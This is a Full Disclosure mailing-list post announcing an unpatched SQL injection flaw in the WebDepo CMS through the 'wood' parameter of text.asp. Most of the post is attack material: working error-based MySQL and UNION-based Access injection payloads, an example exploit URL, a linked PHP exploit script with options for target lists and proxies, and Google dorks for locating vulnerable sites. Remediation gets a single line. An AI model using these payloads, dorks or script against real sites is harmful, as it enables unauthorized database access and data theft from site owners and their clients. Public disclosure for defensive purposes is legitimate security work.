Full Disclosure mailing list archives



(0DAY) WebDepo -SQL injection / INURL BRASIL

Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection vulnerabilities ========================== Injection is possible through the file text.asp Exploit-Example: DBMS: 'MySQL' Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) DBMS: 'Microsoft Access' Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 Ex: http://target.us/text.asp?wood=(id)+Exploit ========================== SCRIPT EXPLOIT ========================== http://pastebin.com/b6bWuw7k --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html ========================== GOOGLE DORK ========================== inurl:"text.asp?wood=" site:il inurl:"text.asp?wood=" site:com inurl:"text.asp?wood=" ========================== Solution: ========================== Sanitizing all requests coming from the client ========================== Credits: ========================== AUTOR: Cleiton Pinheiro / Nick: googleINURL Blog: http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil Pastebin http://pastebin.com/u/Googleinurl GIT: https://github.com/googleinurl PSS: http://packetstormsecurity.com/user/googleinurl YOUTUBE: http://youtube.com/c/INURLBrasil PLUS: http://google.com/+INURLBrasil ========================== References: ========================== [1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html [2] https://msdn.microsoft.com/en-us/library/ff648339.aspx _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

By Date By Thread

Current thread: